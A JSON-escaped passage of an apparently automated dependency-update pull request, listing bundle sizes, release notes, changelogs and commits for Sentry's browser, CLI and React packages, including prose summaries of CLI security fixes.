KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e - with treeshaking flags\u003c/td\u003e\n\u003ctd\u003e24.69 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e43.69 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing + Span Streaming)\u003c/td\u003e\n\u003ctd\u003e45.62 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Profiling)\u003c/td\u003e\n\u003ctd\u003e48.56 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay)\u003c/td\u003e\n\u003ctd\u003e82.4 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay) - with treeshaking flags\u003c/td\u003e\n\u003ctd\u003e72.08 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay with Canvas)\u003c/td\u003e\n\u003ctd\u003e86.99 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay, Feedback)\u003c/td\u003e\n\u003ctd\u003e99.33 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Feedback)\u003c/td\u003e\n\u003ctd\u003e43 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. sendFeedback)\u003c/td\u003e\n\u003ctd\u003e30.92 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. FeedbackAsync)\u003c/td\u003e\n\u003ctd\u003e35.91 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Metrics)\u003c/td\u003e\n\u003ctd\u003e27.27 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Logs)\u003c/td\u003e\n\u003ctd\u003e27.42 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Metrics \u0026amp; Logs)\u003c/td\u003e\n\u003ctd\u003e28.08 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/react\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e27.92 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/react\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e45.9 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/vue\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e31.01 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/vue\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e45.5 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/svelte\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e26.24 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle\u003c/td\u003e\n\u003ctd\u003e28.55 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e46.04 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e29.89 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e47.14 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Replay, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e68.3 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay)\u003c/td\u003e\n\u003ctd\u003e82.55 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e83.6 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Feedback)\u003c/td\u003e\n\u003ctd\u003e88.23 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Feedback, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e89.3 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle - uncompressed\u003c/td\u003e\n\u003ctd\u003e83.97 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing) - uncompressed\u003c/td\u003e\n\u003ctd\u003e138.12 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e88.07 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e141.5 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Replay, Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e209.97 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-javascript/blob/develop/CHANGELOG.md\"\u003e@​sentry/browser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.53.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/test-applications/nextjs-15-intl (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20821\"\u003e#20821\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e10.53.0\u003c/h2\u003e\n\u003ch3\u003eImportant Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003efeat(core): Add \u003ccode\u003estreamGenAiSpans\u003c/code\u003e options to stream gen_ai spans (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20785\"\u003e#20785\u003c/a\u003e)\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eAdds a new \u003ccode\u003estreamGenAiSpans\u003c/code\u003e option that controls how \u003ccode\u003egen_ai\u003c/code\u003e spans are\nsent to Sentry. When set, the SDK extracts all \u003ccode\u003egen_ai\u003c/code\u003e spans out of a\ntransaction and sends them as v2 envelope items.\u003c/p\u003e\n\u003cp\u003eEnable this option if gen_ai spans are being dropped because the transaction payload exceeds size limits.\u003c/p\u003e\n\u003cpre lang=\"ts\"\u003e\u003ccode\u003eSentry.init({\n  dsn: 'https://examplePublicKey@o0.ingest.sentry.io/0',\n  streamGenAiSpans: true,\n});\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat(browser): Migrate browser profiling thread data to span attributes (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20800\"\u003e#20800\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): Add \u003ccode\u003eaddConsoleInstrumentationFilter\u003c/code\u003e utility (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20790\"\u003e#20790\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): Add \u003ccode\u003eapplicationKey\u003c/code\u003e to \u003ccode\u003eBuildTimeOptionsBase\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20789\"\u003e#20789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): split exports by browser/server for bundle size (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20435\"\u003e#20435\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(nextjs): Add top-level \u003ccode\u003eapplicationKey\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20794\"\u003e#20794\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(node): Support Node 26 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20710\"\u003e#20710\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(profiling-node): Bump \u003ccode\u003e@sentry-internal/node-cpu-profiler\u003c/code\u003e to 2.4.0 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20720\"\u003e#20720\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(cloudflare): avoid flush lock self-wait (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20719\"\u003e#20719\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(hono): Capture transaction name on request for correct culprit (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20801\"\u003e#20801\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(mcp): retroactively wrap handlers registered before wrapMcpServerWithSentry (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20699\"\u003e#20699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(node-core): Guard against undefined util.getSystemErrorMap (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20660\"\u003e#20660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(replay): Capture aborted/errored fetch requests in replay network tab (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20722\"\u003e#20722\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/cd9740818cba748dbced0e8a1497000a88ec8a56\"\u003e\u003ccode\u003ecd97408\u003c/code\u003e\u003c/a\u003e release: 10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/66cfb25117ed7b14ca3da20a79b836619e9c8a6c\"\u003e\u003ccode\u003e66cfb25\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20838\"\u003e#20838\u003c/a\u003e from getsentry/prepare-release/10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/df8fd3863043f143961a5d96e79a717d62eada31\"\u003e\u003ccode\u003edf8fd38\u003c/code\u003e\u003c/a\u003e meta(changelog): Update changelog for 10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/588100986580e0f5c8c3204661e59e5103e7d269\"\u003e\u003ccode\u003e5881009\u003c/code\u003e\u003c/a\u003e fix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/6a7d179ad38c7591021c88e4bd3ec82b3c6cc606\"\u003e\u003ccode\u003e6a7d179\u003c/code\u003e\u003c/a\u003e fix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/ad47c3c3de5b2bacfbbd08bcdf9cd90184ce64bc\"\u003e\u003ccode\u003ead47c3c\u003c/code\u003e\u003c/a\u003e ref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/28d6fe514d5ed00561a8e3d1c0406a8cb544c738\"\u003e\u003ccode\u003e28d6fe5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20826\"\u003e#20826\u003c/a\u003e from getsentry/master\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/46aca45a868d717939448ded1001fac4337ac46e\"\u003e\u003ccode\u003e46aca45\u003c/code\u003e\u003c/a\u003e Merge branch 'release/10.53.0'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/b5cbc9ca1800e1b4ee1de66e135a90891cecd570\"\u003e\u003ccode\u003eb5cbc9c\u003c/code\u003e\u003c/a\u003e chore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/tes...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/05489b83e7920fc4ce47a530054c5558c1704a45\"\u003e\u003ccode\u003e05489b8\u003c/code\u003e\u003c/a\u003e release: 10.53.0\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/getsentry/sentry-javascript/compare/10.51.0...10.53.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@sentry/cli` from 3.4.1 to 3.4.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-cli/releases\"\u003e@​sentry/cli's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.4.3\u003c/h2\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBehavior-breaking\u003c/strong\u003e: Disable Xcode \u003ccode\u003eInfo.plist\u003c/code\u003e preprocessing by default to avoid passing project-controlled compiler settings to \u003ccode\u003ecc\u003c/code\u003e during release auto-discovery. This affects \u003ccode\u003esentry-cli releases propose-version\u003c/code\u003e, \u003ccode\u003esentry-cli send-event\u003c/code\u003e and \u003ccode\u003esentry-cli bash-hook --send-event\u003c/code\u003e release inference, and \u003ccode\u003esentry-cli react-native xcode\u003c/code\u003e auto-release detection. Use \u003ccode\u003e--allow-xcode-infoplist-preprocessing\u003c/code\u003e only for trusted projects that require preprocessing.\u003c/li\u003e\n\u003cli\u003eEnsure restrictive file permissions maintained when \u003ccode\u003esentry-cli login\u003c/code\u003e updates existing config files.\u003c/li\u003e\n\u003cli\u003eDisable TLS verification only when \u003ccode\u003ehttp.verify_ssl\u003c/code\u003e is set to \u003ccode\u003efalse\u003c/code\u003e, case-insensitively.\u003c/li\u003e\n\u003cli\u003eShell-escape generated \u003ccode\u003ebash-hook\u003c/code\u003e arguments, including paths, tags, release names, and the CLI path.\u003c/li\u003e\n\u003cli\u003eStop sending environment variables in \u003ccode\u003esentry-cli bash-hook\u003c/code\u003e events.\u003c/li\u003e\n\u003cli\u003eVerify the downloaded binary checksum before replacing the current executable in \u003ccode\u003esentry-cli update\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Skip uploading images that already exist in objectstore by batch-checking with HEAD requests first (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3305\"\u003e#3305\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Reject snapshot uploads that have a PR number but no base SHA, since comparisons cannot work without a base reference (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3300\"\u003e#3300\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.4.3-snapshot.20260521.69f5028\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 69f5028.\u003c/p\u003e\n\u003ch2\u003e3.4.3-snapshot.20260520.9eabaaa\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 9eabaaa.\u003c/p\u003e\n\u003ch2\u003e3.4.3-snapshot.20260511.6679316\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 6679316.\u003c/p\u003e\n\u003ch2\u003e3.4.3-snapshot.20260511.7a3b571\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 7a3b571.\u003c/p\u003e\n\u003ch2\u003e3.4.2\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Stop sending Sentry auth token to Objectstore (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3286\"\u003e#3286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e(js) Fix argument injection in JavaScript API's \u003ccode\u003eserializeOptions\u003c/code\u003e. String/number options now validate input types and prevent \u003ccode\u003eArray.prototype.concat()\u003c/code\u003e from flattening array values into separate CLI arguments. (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3287\"\u003e#3287\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.4.2-snapshot.20260511.9081115\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 9081115.\u003c/p\u003e\n\u003ch2\u003e3.4.2-snapshot.20260511.4052e78\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 4052e78.\u003c/p\u003e\n\u003ch2\u003e3.4.2-snapshot.20260511.04c061a\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 04c061a.\u003c/p\u003e\n\u003ch2\u003e3.4.2-snapshot.20260511.f5db2f6\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at f5db2f6.\u003c/p\u003e\n\u003ch2\u003e3.4.2-snapshot.20260508.660e98b\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 660e98b.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-cli/blob/master/CHANGELOG.md\"\u003e@​sentry/cli's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.4.3\u003c/h2\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBehavior-breaking\u003c/strong\u003e: Disable Xcode \u003ccode\u003eInfo.plist\u003c/code\u003e preprocessing by default to avoid passing project-controlled compiler settings to \u003ccode\u003ecc\u003c/code\u003e during release auto-discovery. This affects \u003ccode\u003esentry-cli releases propose-version\u003c/code\u003e, \u003ccode\u003esentry-cli send-event\u003c/code\u003e and \u003ccode\u003esentry-cli bash-hook --send-event\u003c/code\u003e release inference, and \u003ccode\u003esentry-cli react-native xcode\u003c/code\u003e auto-release detection. Use \u003ccode\u003e--allow-xcode-infoplist-preprocessing\u003c/code\u003e only for trusted projects that require preprocessing.\u003c/li\u003e\n\u003cli\u003eEnsure restrictive file permissions maintained when \u003ccode\u003esentry-cli login\u003c/code\u003e updates existing config files.\u003c/li\u003e\n\u003cli\u003eDisable TLS verification only when \u003ccode\u003ehttp.verify_ssl\u003c/code\u003e is set to \u003ccode\u003efalse\u003c/code\u003e, case-insensitively.\u003c/li\u003e\n\u003cli\u003eShell-escape generated \u003ccode\u003ebash-hook\u003c/code\u003e arguments, including paths, tags, release names, and the CLI path.\u003c/li\u003e\n\u003cli\u003eStop sending environment variables in \u003ccode\u003esentry-cli bash-hook\u003c/code\u003e events.\u003c/li\u003e\n\u003cli\u003eVerify the downloaded binary checksum before replacing the current executable in \u003ccode\u003esentry-cli update\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Skip uploading images that already exist in objectstore by batch-checking with HEAD requests first (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3305\"\u003e#3305\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Reject snapshot uploads that have a PR number but no base SHA, since comparisons cannot work without a base reference (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3300\"\u003e#3300\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.4.2\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Stop sending Sentry auth token to Objectstore (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3286\"\u003e#3286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e(js) Fix argument injection in JavaScript API's \u003ccode\u003eserializeOptions\u003c/code\u003e. String/number options now validate input types and prevent \u003ccode\u003eArray.prototype.concat()\u003c/code\u003e from flattening array values into separate CLI arguments. (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3287\"\u003e#3287\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/ee5286953ea3b7e419e017c3c47f64e26a45ff19\"\u003e\u003ccode\u003eee52869\u003c/code\u003e\u003c/a\u003e release: 3.4.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/69f502877977e2e8aa54d913733be4557054ce42\"\u003e\u003ccode\u003e69f5028\u003c/code\u003e\u003c/a\u003e fix: Various fixes (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3308\"\u003e#3308\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/9eabaaabdb47e735e79fbb81f127e5083d5984b6\"\u003e\u003ccode\u003e9eabaaa\u003c/code\u003e\u003c/a\u003e perf(snapshots): Skip uploading images that already exist in objectstore (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3305\"\u003e#3305\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/2624b8d581ca1392675e27c96192646af273dee2\"\u003e\u003ccode\u003e2624b8d\u003c/code\u003e\u003c/a\u003e fix(snapshots): Reject uploads with pr_number but no base_sha (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3300\"\u003e#3300\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/667931613bf29c8dbf1d95d18dff74ae8644b684\"\u003e\u003ccode\u003e6679316\u003c/code\u003e\u003c/a\u003e build(npm): 🤖 Bump optional dependencies to 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/7a3b571784b6f509a66d682bf336262425686607\"\u003e\u003ccode\u003e7a3b571\u003c/code\u003e\u003c/a\u003e Merge branch 'release/3.4.2'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/e3f5f5518d53dfb00596df952a1a0513e11a90ee\"\u003e\u003ccode\u003ee3f5f55\u003c/code\u003e\u003c/a\u003e release: 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/f5db2f65581756fe78c49a22937db7c08610acb2\"\u003e\u003ccode\u003ef5db2f6\u003c/code\u003e\u003c/a\u003e build(deps): Update \u003ccode\u003eopenssl\u003c/code\u003e dependency (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3294\"\u003e#3294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/4052e78e2898282a377d8d82ce9d832faed06d25\"\u003e\u003ccode\u003e4052e78\u003c/code\u003e\u003c/a\u003e build(deps): Bump \u003ccode\u003erand\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3296\"\u003e#3296\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/04c061a407eaeda6e587edd495bc597161d31138\"\u003e\u003ccode\u003e04c061a\u003c/code\u003e\u003c/a\u003e build(js): Update \u003ccode\u003efast-uri\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3295\"\u003e#3295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/getsentry/sentry-cli/compare/3.4.1...3.4.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@sentry/react` from 10.51.0 to 10.53.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-javascript/releases\"\u003e@​sentry/react's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.53.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/test-applications/nextjs-15-intl (\u003ca 